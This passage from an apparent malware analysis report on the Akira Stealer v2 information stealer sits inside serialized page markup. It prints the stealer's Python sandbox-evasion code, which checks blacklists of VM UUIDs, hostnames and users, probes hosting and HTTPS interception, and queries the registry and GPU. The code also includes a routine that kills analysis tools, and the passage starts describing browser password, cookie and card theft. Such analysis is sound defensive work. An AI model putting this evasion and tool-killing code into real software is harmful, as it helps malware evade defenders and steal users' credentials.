VmProtect.BLACKLISTED_USERS\n",[1588,11296,11297],{"class":1590,"line":2135},[1588,11298,9865],{"emptyLinePlaceholder":508},[1588,11300,11301],{"class":1590,"line":2141},[1588,11302,11303],{},"BLACKLISTED_USERS = (\n",[1588,11305,11306],{"class":1590,"line":2147},[1588,11307,11308],{}," 'wdagutilityaccount','abby','peter wilson','hmarc',\n",[1588,11310,11311],{"class":1590,"line":2153},[1588,11312,11313],{}," 'a.monaldo','tvm',\n",[1588,11315,11316],{"class":1590,"line":2159},[1588,11317,11318],{}," # ... 30+ more entries ...\n",[1588,11320,11321],{"class":1590,"line":2165},[1588,11322,11258],{},[806,11324,11325],{},"This check enhances detection by focusing on user context, which may remain unchanged even across reboots or virtual machine snapshots.",[1671,11327,11329],{"id":11328},"_738-hosting-check-detecting-public-cloud-infrastructure","7.3.8 Hosting Check – Detecting Public Cloud Infrastructure",[806,11331,1677],{},[806,11333,11334,11335,11338],{},"Some malware uses external IP intelligence services to verify whether the infected system resides in a known data center or cloud provider environment. In this case, a simple HTTP request is made to ",[1524,11336,11337],{},"ip-api.com",", asking whether the IP is flagged as \"hosting\".",[1545,11340,11342],{"className":10501,"code":11341,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkHosting() -> bool:\n http = PoolManager(cert_reqs=\"CERT_NONE\")\n try:\n return http.request(\n 'GET',\n 'http://ip-api.com/line/?fields=hosting'\n ).data.decode().strip() == 'true'\n except:\n return False\n",[1524,11343,11344,11348,11353,11358,11362,11367,11372,11377,11382,11386],{"__ignoreMap":863},[1588,11345,11346],{"class":1590,"line":1591},[1588,11347,10991],{},[1588,11349,11350],{"class":1590,"line":864},[1588,11351,11352],{},"def checkHosting() -> bool:\n",[1588,11354,11355],{"class":1590,"line":1814},[1588,11356,11357],{}," http = PoolManager(cert_reqs=\"CERT_NONE\")\n",[1588,11359,11360],{"class":1590,"line":1831},[1588,11361,11154],{},[1588,11363,11364],{"class":1590,"line":2135},[1588,11365,11366],{}," return http.request(\n",[1588,11368,11369],{"class":1590,"line":2141},[1588,11370,11371],{}," 'GET',\n",[1588,11373,11374],{"class":1590,"line":2147},[1588,11375,11376],{}," 'http://ip-api.com/line/?fields=hosting'\n",[1588,11378,11379],{"class":1590,"line":2153},[1588,11380,11381],{}," ).data.decode().strip() == 'true'\n",[1588,11383,11384],{"class":1590,"line":2159},[1588,11385,11179],{},[1588,11387,11388],{"class":1590,"line":2165},[1588,11389,11390],{}," return False\n",[806,11392,11393],{},"This allows the malware to determine if it’s running on infrastructure owned by Microsoft Azure, AWS, DigitalOcean, etc.—a red flag for sandboxing.",[1671,11395,11397],{"id":11396},"_739-https-simulation-check-probing-for-ssl-interception","7.3.9 HTTPS Simulation Check – Probing for SSL Interception",[806,11399,1677],{},[806,11401,11402,11403,11406],{},"To identify environments with SSL inspection (common in corporate or research networks), the malware issues a benign HTTPS request to a random subdomain under ",[1524,11404,11405],{},".in",". If the connection fails—due to DNS filtering, interception proxies, or certificate pinning failures—it may signal that the malware is being analyzed.",[1545,11408,11410],{"className":10501,"code":11409,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkHTTPSimulation() -> bool:\n http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n try:\n http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n except:\n return False\n return True\n",[1524,11411,11412,11416,11421,11426,11430,11435,11439,11443],{"__ignoreMap":863},[1588,11413,11414],{"class":1590,"line":1591},[1588,11415,10991],{},[1588,11417,11418],{"class":1590,"line":864},[1588,11419,11420],{},"def checkHTTPSimulation() -> bool:\n",[1588,11422,11423],{"class":1590,"line":1814},[1588,11424,11425],{}," http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n",[1588,11427,11428],{"class":1590,"line":1831},[1588,11429,11154],{},[1588,11431,11432],{"class":1590,"line":2135},[1588,11433,11434],{}," http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n",[1588,11436,11437],{"class":1590,"line":2141},[1588,11438,11179],{},[1588,11440,11441],{"class":1590,"line":2147},[1588,11442,11390],{},[1588,11444,11445],{"class":1590,"line":2153},[1588,11446,11447],{}," return True\n",[806,11449,11450],{},"This subtle approach tests the network path's integrity without triggering alarms or requiring dedicated infrastructure.",[1671,11452,11454],{"id":11453},"_7310-registry-gpu-driver-check-detecting-virtual-gpu-signatures","7.3.10 Registry & GPU Driver Check – Detecting Virtual GPU Signatures",[806,11456,1677],{},[806,11458,11459,11460,11463],{},"Certain virtual environments are betrayed by registry keys or GPU driver descriptors. Akira executes a dual strategy: it queries registry entries tied to the graphics subsystem, and separately examines the output of ",[1524,11461,11462],{},"wmic"," for suspicious GPU strings.",[1545,11465,11467],{"className":10501,"code":11466,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkRegistry() -> bool:\n r1 = subprocess.run(\n \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n capture_output=True, shell=True)\n r2 = subprocess.run(\n \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n capture_output=True, shell=True)\n\n # GPU name check\n gpu_out = subprocess.run(\n \"wmic path win32_VideoController get name\",\n capture_output=True, shell=True).stdout.decode().splitlines()\n gpucheck = any(x in gpu_out[2].lower()\n for x in (\"virtualbox\", \"vmware\"))\n return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[1524,11468,11469,11473,11478,11483,11488,11493,11498,11503,11507,11511,11516,11521,11526,11531,11536,11541],{"__ignoreMap":863},[1588,11470,11471],{"class":1590,"line":1591},[1588,11472,10991],{},[1588,11474,11475],{"class":1590,"line":864},[1588,11476,11477],{},"def checkRegistry() -> bool:\n",[1588,11479,11480],{"class":1590,"line":1814},[1588,11481,11482],{}," r1 = subprocess.run(\n",[1588,11484,11485],{"class":1590,"line":1831},[1588,11486,11487],{}," \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n",[1588,11489,11490],{"class":1590,"line":2135},[1588,11491,11492],{}," capture_output=True, shell=True)\n",[1588,11494,11495],{"class":1590,"line":2141},[1588,11496,11497],{}," r2 = subprocess.run(\n",[1588,11499,11500],{"class":1590,"line":2147},[1588,11501,11502],{}," \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n",[1588,11504,11505],{"class":1590,"line":2153},[1588,11506,11492],{},[1588,11508,11509],{"class":1590,"line":2159},[1588,11510,9865],{"emptyLinePlaceholder":508},[1588,11512,11513],{"class":1590,"line":2165},[1588,11514,11515],{}," # GPU name check\n",[1588,11517,11518],{"class":1590,"line":11039},[1588,11519,11520],{}," gpu_out = subprocess.run(\n",[1588,11522,11523],{"class":1590,"line":11045},[1588,11524,11525],{}," \"wmic path win32_VideoController get name\",\n",[1588,11527,11528],{"class":1590,"line":11051},[1588,11529,11530],{}," capture_output=True, shell=True).stdout.decode().splitlines()\n",[1588,11532,11533],{"class":1590,"line":11057},[1588,11534,11535],{}," gpucheck = any(x in gpu_out[2].lower()\n",[1588,11537,11538],{"class":1590,"line":11063},[1588,11539,11540],{}," for x in (\"virtualbox\", \"vmware\"))\n",[1588,11542,11543],{"class":1590,"line":11069},[1588,11544,11545],{}," return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[806,11547,11548],{},"These hardware-layer checks are particularly effective against analyst setups that may not fully mask virtualized display adapters.",[1671,11550,11552],{"id":11551},"_7311-task-killing-suppressing-analysis-tools-in-real-time","7.3.11 Task-Killing – Suppressing Analysis Tools in Real Time",[806,11554,1677],{},[806,11556,11557],{},"Rather than only evading detection passively, Akira goes a step further by actively terminating known analysis or debugging tools. It spins off a background thread that iterates over a list of processes and kills any match it finds.",[1545,11559,11561],{"className":10501,"code":11560,"language":10503,"meta":863,"style":863},"@staticmethod\ndef killTasks() -> None:\n Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n\nBLACKLISTED_TASKS = (\n 'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n # ... dozens more ...\n 'glasswire','requestly'\n)\n",[1524,11562,11563,11567,11572,11577,11581,11586,11591,11596,11601],{"__ignoreMap":863},[1588,11564,11565],{"class":1590,"line":1591},[1588,11566,10991],{},[1588,11568,11569],{"class":1590,"line":864},[1588,11570,11571],{},"def killTasks() -> None:\n",[1588,11573,11574],{"class":1590,"line":1814},[1588,11575,11576],{}," Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[1588,11578,11579],{"class":1590,"line":1831},[1588,11580,9865],{"emptyLinePlaceholder":508},[1588,11582,11583],{"class":1590,"line":2135},[1588,11584,11585],{},"BLACKLISTED_TASKS = (\n",[1588,11587,11588],{"class":1590,"line":2141},[1588,11589,11590],{}," 'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n",[1588,11592,11593],{"class":1590,"line":2147},[1588,11594,11595],{}," # ... dozens more ...\n",[1588,11597,11598],{"class":1590,"line":2153},[1588,11599,11600],{}," 'glasswire','requestly'\n",[1588,11602,11603],{"class":1590,"line":2159},[1588,11604,11258],{},[806,11606,11607],{},"These tools—commonly used by incident responders and malware analysts—are neutralized before they can collect meaningful behavioral artifacts.",[806,11609,11610],{},[1736,11611,11612],{},"Summary",[806,11614,11615],{},"Akira uses a sophisticated suite of anti-analysis techniques that target multiple system layers — from environment variables and registry keys to network probes and task lists. These mechanisms are designed to detect and evade both automated sandboxes and manual inspection setups.",[806,11617,11618],{},"The combination of passive fingerprinting and active suppression (e.g., task killing) demonstrates how even mid-tier malware families now integrate multi-layer evasion logic.",[1671,11620,11622],{"id":11621},"_7312-complete-blacklists-detection-functions","7.3.12 Complete Blacklists & Detection Functions",[806,11624,1677],{},[806,11626,11627],{},[1736,11628,11629],{},"Blacklisted Hardware UUIDs",[1545,11631,11634],{"className":11632,"code":11633,"language":916},[1548],"BLACKLISTED_UUIDS = (\n '7AB5C494-39F5-4941-9163-47F54D6D5016',\n '032E02B4-0499-05C3-0806-3C0700080009',\n '03DE0294-0480-05DE-1A06-350700080009',\n '11111111-2222-3333-4444-555555555555',\n '6F3CA5EC-BEC9-4A4D-8274-11168F640058',\n 'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',\n '4C4C4544-0050-3710-8058-CAC04F59344A',\n '00000000-0000-0000-0000-AC1F6BD04972',\n '00000000-0000-0000-0000-000000000000',\n '5BD24D56-789F-8468-7CDC-CAA7222CC121',\n '49434D53-0200-9065-2500-65902500E439',\n '49434D53-0200-9036-2500-36902500F022',\n '777D84B3-88D1-451C-93E4-D235177420A7',\n '49434D53-0200-9036-2500-369025000C65',\n 'B1112042-52E8-E25B-3655-6A4F54155DBF',\n '00000000-0000-0000-0000-AC1F6BD048FE',\n 'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\n 'A15A930C-8251-9645-AF63-E45AD728C20C',\n '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\n 'C7D23342-A5D4-68A1-59AC-CF40F735B363',\n '63203342-0EB0-AA1A-4DF5-3FB37DBB0670',\n '44B94D56-65AB-DC02-86A0-98143A7423BF',\n '6608003F-ECE4-494E-B07E-1C4615D1D93C',\n 'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\n '49434D53-0200-9036-2500-369025003AF0',\n '8B4E8278-525C-7343-B825-280AEBCD3BCB',\n '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27',\n '79AF5279-16CF-4094-9758-F88A616D81B4',\n 'FE822042-A70C-D08B-F1D1-C207055A488F',\n '76122042-C286-FA81-F0A8-514CC507B250',\n '481E2042-A1AF-D390-CE06-A8F783B1E76A',\n 'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',\n '9961A120-E691-4FFE-B67B-F0E4115D5919'\n)\n",[1524,11635,11633],{"__ignoreMap":863},[806,11637,11638],{},[1736,11639,11640],{},"Blacklisted Computer Names",[1545,11642,11645],{"className":11643,"code":11644,"language":916},[1548],"BLACKLISTED_COMPUTERNAMES = (\n '00900BC83802', 'bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr',\n 'b30f0242-1c6a-4', 'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb',\n 'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc',\n 'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc',\n 'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs',\n 'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',\n 'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076',\n 'desktop-vkeons4', 'NTT-EFF-2W11WSS'\n)\n",[1524,11646,11644],{"__ignoreMap":863},[806,11648,11649],{},[1736,11650,11651],{},"Blacklisted User Accounts",[1545,11653,11656],{"className":11654,"code":11655,"language":916},[1548],"BLACKLISTED_USERS = (\n 'wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\n 'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq',\n 'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',\n 'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl',\n 'harry johnson', 'j.seance', 'a.monaldo', 'tvm'\n)\n",[1524,11657,11655],{"__ignoreMap":863},[806,11659,11660],{},[1736,11661,11662],{},"Blacklisted Analysis‐Tool Processes",[1545,11664,11667],{"className":11665,"code":11666,"language":916},[1548],"BLACKLISTED_TASKS = (\n 'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler',\n 'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray',\n 'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',\n 'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc',\n 'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol',\n 'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice',\n 'discordtokenprotector', 'glasswire', 'requestly'\n)\n",[1524,11668,11666],{"__ignoreMap":863},[806,11670,11671],{},[1736,11672,11673],{},"Core Detection Methods",[1545,11675,11677],{"className":10501,"code":11676,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkUUID() -> bool:\n \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n try:\n raw = subprocess.run(\n \"wmic csproduct get uuid\",\n shell=True, capture_output=True\n ).stdout.splitlines()[2].decode(errors='ignore').strip()\n except:\n raw = \"\"\n return raw in VmProtect.BLACKLISTED_UUIDS\n\n@staticmethod\ndef checkComputerName() -> bool:\n \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n\n@staticmethod\ndef checkUsers() -> bool:\n \"\"\"Current login username in VM users list.\"\"\"\n return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n\n@staticmethod\ndef checkHosting() -> bool:\n \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n http = PoolManager(cert_reqs=\"CERT_NONE\")\n try:\n return http.request(\n 'GET', 'http://ip-api.com/line/?fields=hosting'\n ).data.decode().strip() == 'true'\n except:\n return False\n\n@staticmethod\ndef checkHTTPSimulation() -> bool:\n \"\"\"\n Attempt TLS to random subdomain.\n Failure → possible HTTPS interception/sandbox.\n \"\"\"\n http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n try:\n http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n return True\n except:\n return False\n\n@staticmethod\ndef checkRegistry() -> bool:\n \"\"\"\n Look for VirtualBox/VMware in:\n - Registry driver entries\n - Video card name via WMIC\n - Presence of VM-specific folders\n \"\"\"\n r1 = subprocess.run(\n \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n shell=True, capture_output=True\n )\n r2 = subprocess.run(\n \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n shell=True, capture_output=True\n )\n gpu = any(\n x.lower() in subprocess.run(\n \"wmic path win32_VideoController get name\",\n shell=True, capture_output=True\n ).stdout.decode().splitlines()[2].lower()\n for x in (\"virtualbox\", \"vmware\")\n )\n dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n\n@staticmethod\ndef killTasks() -> None:\n \"\"\"Continuously terminate known analysis processes.\"\"\"\n Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[1524,11678,11679,11683,11687,11692,11696,11700,11705,11710,11715,11719,11723,11727,11731,11735,11739,11744,11749,11753,11757,11761,11766,11771,11775,11779,11783,11788,11793,11798,11803,11809,11814,11819,11824,11829,11834,11839,11845,11851,11857,11862,11867,11872,11877,11883,11888,11893,11898,11903,11908,11913,11919,11925,11931,11937,11942,11947,11953,11959,11965,11971,11976,11981,11987,11992,11997,12003,12009,12015,12020,12026,12032,12037,12043,12049,12054,12059,12064,12070],{"__ignoreMap":863},[1588,11680,11681],{"class":1590,"line":1591},[1588,11682,10991],{},[1588,11684,11685],{"class":1590,"line":864},[1588,11686,11149],{},[1588,11688,11689],{"class":1590,"line":1814},[1588,11690,11691],{}," \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n",[1588,11693,11694],{"class":1590,"line":1831},[1588,11695,11154],{},[1588,11697,11698],{"class":1590,"line":2135},[1588,11699,11159],{},[1588,11701,11702],{"class":1590,"line":2141},[1588,11703,11704],{}," \"wmic csproduct get uuid\",\n",[1588,11706,11707],{"class":1590,"line":2147},[1588,11708,11709],{}," shell=True, capture_output=True\n",[1588,11711,11712],{"class":1590,"line":2153},[1588,11713,11714],{}," ).stdout.splitlines()[2].decode(errors='ignore').strip()\n",[1588,11716,11717],{"class":1590,"line":2159},[1588,11718,11179],{},[1588,11720,11721],{"class":1590,"line":2165},[1588,11722,11184],{},[1588,11724,11725],{"class":1590,"line":11039},[1588,11726,11189],{},[1588,11728,11729],{"class":1590,"line":11045},[1588,11730,9865],{"emptyLinePlaceholder":508},[1588,11732,11733],{"class":1590,"line":11051},[1588,11734,10991],{},[1588,11736,11737],{"class":1590,"line":11057},[1588,11738,11219],{},[1588,11740,11741],{"class":1590,"line":11063},[1588,11742,11743],{}," \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n",[1588,11745,11746],{"class":1590,"line":11069},[1588,11747,11748],{}," return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[1588,11750,11751],{"class":1590,"line":11075},[1588,11752,9865],{"emptyLinePlaceholder":508},[1588,11754,11755],{"class":1590,"line":11081},[1588,11756,10991],{},[1588,11758,11759],{"class":1590,"line":11087},[1588,11760,11284],{},[1588,11762,11763],{"class":1590,"line":11093},[1588,11764,11765],{}," \"\"\"Current login username in VM users list.\"\"\"\n",[1588,11767,11768],{"class":1590,"line":11099},[1588,11769,11770],{}," return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n",[1588,11772,11773],{"class":1590,"line":11105},[1588,11774,9865],{"emptyLinePlaceholder":508},[1588,11776,11777],{"class":1590,"line":11111},[1588,11778,10991],{},[1588,11780,11781],{"class":1590,"line":11117},[1588,11782,11352],{},[1588,11784,11785],{"class":1590,"line":11123},[1588,11786,11787],{}," \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n",[1588,11789,11791],{"class":1590,"line":11790},26,[1588,11792,11357],{},[1588,11794,11796],{"class":1590,"line":11795},27,[1588,11797,11154],{},[1588,11799,11801],{"class":1590,"line":11800},28,[1588,11802,11366],{},[1588,11804,11806],{"class":1590,"line":11805},29,[1588,11807,11808],{}," 'GET', 'http://ip-api.com/line/?fields=hosting'\n",[1588,11810,11812],{"class":1590,"line":11811},30,[1588,11813,11381],{},[1588,11815,11817],{"class":1590,"line":11816},31,[1588,11818,11179],{},[1588,11820,11822],{"class":1590,"line":11821},32,[1588,11823,11390],{},[1588,11825,11827],{"class":1590,"line":11826},33,[1588,11828,9865],{"emptyLinePlaceholder":508},[1588,11830,11832],{"class":1590,"line":11831},34,[1588,11833,10991],{},[1588,11835,11837],{"class":1590,"line":11836},35,[1588,11838,11420],{},[1588,11840,11842],{"class":1590,"line":11841},36,[1588,11843,11844],{}," \"\"\"\n",[1588,11846,11848],{"class":1590,"line":11847},37,[1588,11849,11850],{}," Attempt TLS to random subdomain.\n",[1588,11852,11854],{"class":1590,"line":11853},38,[1588,11855,11856],{}," Failure → possible HTTPS interception/sandbox.\n",[1588,11858,11860],{"class":1590,"line":11859},39,[1588,11861,11844],{},[1588,11863,11865],{"class":1590,"line":11864},40,[1588,11866,11425],{},[1588,11868,11870],{"class":1590,"line":11869},41,[1588,11871,11154],{},[1588,11873,11875],{"class":1590,"line":11874},42,[1588,11876,11434],{},[1588,11878,11880],{"class":1590,"line":11879},43,[1588,11881,11882],{}," return True\n",[1588,11884,11886],{"class":1590,"line":11885},44,[1588,11887,11179],{},[1588,11889,11891],{"class":1590,"line":11890},45,[1588,11892,11390],{},[1588,11894,11896],{"class":1590,"line":11895},46,[1588,11897,9865],{"emptyLinePlaceholder":508},[1588,11899,11901],{"class":1590,"line":11900},47,[1588,11902,10991],{},[1588,11904,11906],{"class":1590,"line":11905},48,[1588,11907,11477],{},[1588,11909,11911],{"class":1590,"line":11910},49,[1588,11912,11844],{},[1588,11914,11916],{"class":1590,"line":11915},50,[1588,11917,11918],{}," Look for VirtualBox/VMware in:\n",[1588,11920,11922],{"class":1590,"line":11921},51,[1588,11923,11924],{}," - Registry driver entries\n",[1588,11926,11928],{"class":1590,"line":11927},52,[1588,11929,11930],{}," - Video card name via WMIC\n",[1588,11932,11934],{"class":1590,"line":11933},53,[1588,11935,11936],{}," - Presence of VM-specific folders\n",[1588,11938,11940],{"class":1590,"line":11939},54,[1588,11941,11844],{},[1588,11943,11945],{"class":1590,"line":11944},55,[1588,11946,11482],{},[1588,11948,11950],{"class":1590,"line":11949},56,[1588,11951,11952],{}," \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n",[1588,11954,11956],{"class":1590,"line":11955},57,[1588,11957,11958],{}," \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n",[1588,11960,11962],{"class":1590,"line":11961},58,[1588,11963,11964],{}," shell=True, capture_output=True\n",[1588,11966,11968],{"class":1590,"line":11967},59,[1588,11969,11970],{}," )\n",[1588,11972,11974],{"class":1590,"line":11973},60,[1588,11975,11497],{},[1588,11977,11979],{"class":1590,"line":11978},61,[1588,11980,11952],{},[1588,11982,11984],{"class":1590,"line":11983},62,[1588,11985,11986],{}," \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n",[1588,11988,11990],{"class":1590,"line":11989},63,[1588,11991,11964],{},[1588,11993,11995],{"class":1590,"line":11994},64,[1588,11996,11970],{},[1588,11998,12000],{"class":1590,"line":11999},65,[1588,12001,12002],{}," gpu = any(\n",[1588,12004,12006],{"class":1590,"line":12005},66,[1588,12007,12008],{}," x.lower() in subprocess.run(\n",[1588,12010,12012],{"class":1590,"line":12011},67,[1588,12013,12014],{}," \"wmic path win32_VideoController get name\",\n",[1588,12016,12018],{"class":1590,"line":12017},68,[1588,12019,11709],{},[1588,12021,12023],{"class":1590,"line":12022},69,[1588,12024,12025],{}," ).stdout.decode().splitlines()[2].lower()\n",[1588,12027,12029],{"class":1590,"line":12028},70,[1588,12030,12031],{}," for x in (\"virtualbox\", \"vmware\")\n",[1588,12033,12035],{"class":1590,"line":12034},71,[1588,12036,11970],{},[1588,12038,12040],{"class":1590,"line":12039},72,[1588,12041,12042],{}," dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n",[1588,12044,12046],{"class":1590,"line":12045},73,[1588,12047,12048],{}," return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n",[1588,12050,12052],{"class":1590,"line":12051},74,[1588,12053,9865],{"emptyLinePlaceholder":508},[1588,12055,12057],{"class":1590,"line":12056},75,[1588,12058,10991],{},[1588,12060,12062],{"class":1590,"line":12061},76,[1588,12063,11571],{},[1588,12065,12067],{"class":1590,"line":12066},77,[1588,12068,12069],{}," \"\"\"Continuously terminate known analysis processes.\"\"\"\n",[1588,12071,12073],{"class":1590,"line":12072},78,[1588,12074,11576],{},[1671,12076,12078],{"id":12077},"_7313-execution-abort-logic","7.3.13 Execution & Abort Logic",[806,12080,1677],{},[4351,12082,12083,12097,12110],{},[2741,12084,12085,12088,12089,12092,12093,12096],{},[1736,12086,12087],{},"Initialization:"," Within the ",[1524,12090,12091],{},"Akira.__init__()"," constructor, the malware immediately invokes ",[1524,12094,12095],{},"VmProtect.isVM(1)"," to perform quick, low-overhead virtualization checks (e.g., hostname, user, HTTPS simulation).",[2741,12098,12099,12102,12103,12106,12107,12109],{},[1736,12100,12101],{},"Deep Inspection:"," If the initial test passes, it calls ",[1524,12104,12105],{},"VmProtect.isVM(2)",", triggering more comprehensive checks, including hardware UUID validation, hosting detection via ",[1524,12108,11337],{},", and registry artifact scanning.",[2741,12111,12112,12115,12116,12118,12119,12121],{},[1736,12113,12114],{},"Abort Path:"," If any check returns ",[1524,12117,10678],{},", indicating a virtual or analysis environment, the code executes ",[1524,12120,10682],{},", terminating execution before any data collection or exfiltration routines.",[1671,12123,12125],{"id":12124},"_7314-conclusion","7.3.14 Conclusion",[806,12127,1677],{},[806,12129,8620,12130,12132,12133,12135],{},[1524,12131,10626],{}," module in ",[4655,12134,6704],{}," demonstrates a layered defense against analysis, leveraging both local system fingerprints and network-based heuristics. By understanding and instrumenting these precise checks, defenders can turn the tables and detect such evasive malware in operational environments.",[810,12137,12139],{"id":12138},"_74-browser-data-exfiltration","7.4 Browser Data Exfiltration",[806,12141,1536],{},[806,12143,12144,12145,5611,12148,12151],{},"One of the core objectives of Akira Stealer v2 is the large-scale extraction of sensitive browser-stored data. The malware implements tailored modules to target both ",[1736,12146,12147],{},"Chromium-based",[1736,12149,12150],{},"Gecko-based (Firefox)"," browsers. Its capabilities include the extraction and decryption of saved passwords, cookies, credit card data, autofill entries, and even session tokens that can be repurposed for full account hijacking.",[806,12153,12154],{},[1736,12155,12156],{},"1. Workspace Setup",[1545,12158,12160],{"className":10501,"code":12159,"language":10503,"meta":863,"style":863},"client_dir = Utils.get_temp_folder() # e.g., C:\\Windows\\Temp\\DESKTOP-1234\nos.makedirs(client_dir, exist_ok=True)\nfor sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[1524,12161,12162,12167,12172,12177],{"__ignoreMap":863},[1588,12163,12164],{"class":1590,"line":1591},[1588,12165,12166],{},"client_dir = Utils.get_temp_folder() # e.g., C:\\Windows\\Temp\\DESKTOP-1234\n",[1588,12168,12169],{"class":1590,"line":864},[1588,12170,12171],{},"os.makedirs(client_dir, exist_ok=True)\n",[1588,12173,12174],{"class":1590,"line":1814},[1588,12175,12176],{},"for sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n",[1588,12178,12179],{"class":1590,"line":1831},[1588,12180,12181],{}," os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[2738,12183,12184,12191,12194,12197,12200],{},[2741,12185,12186,12187],{},"Creates a disposable staging area under the system temp directory, named after the victim’s machine (%TEMP%\\DESKTOP-",[12188,12189,12190],"hostname",{},"), ensuring all exfiltrated artifacts are consolidated in one easily archiveable location.",[2741,12192,12193],{},"Isolates data by type: six dedicated subfolders (Passwords, Cookies, CreditCards, History, Autofill, Wallets) prevent naming collisions and simplify later zipping—each extraction routine writes only into its own folder.",[2741,12195,12196],{},"Idempotent directory creation uses exist_ok=True so if the malware re-runs (e.g., on reboot or persistence), it won’t crash or overwrite existing data—new items simply append into the same structure.",[2741,12198,12199],{},"Facilitates selective cleanup: once upload and notification are complete, the stealer can call Utils.clear_client_folder() to recursively delete only its own workspace, leaving no residual files behind.",[2741,12201,12202],{},"Sets the stage for parallel extraction threads: by pre-creating all targets, background threads harvesting browser credentials, cookies, autofills, crypto-wallet data, etc., can immediately write results without additional checks, minimizing overhead and reducing the window for defensive hooks to detect unexpected file I/O.",[806,12204,12205],{},[1736,12206,12207],{},"2. Supported Browsers",[2738,12209,12210,12253],{},[2741,12211,12212,12215],{},[1736,12213,12214],{},"Chromium‑based",[2738,12216,12217,12220,12223,12226,12229,12232,12235,12238,12241,12244,12247,12250],{},[2741,12218,12219],{},"Google Chrome (Stable & SxS)",[2741,12221,12222],{},"Microsoft Edge",[2741,12224,12225],{},"Brave Browser",[2741,12227,12228],{},"Opera & Opera GX",[2741,12230,12231],{},"Chromium",[2741,12233,12234],{},"Comodo Dragon",[2741,12236,12237],{},"Epic Privacy Browser",[2741,12239,12240],{},"Iridium Browser",[2741,12242,12243],{},"UR Browser",[2741,12245,12246],{},"Vivaldi Browser",[2741,12248,12249],{},"Yandex Browser",[2741,12251,12252],{},"Slimjet, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, 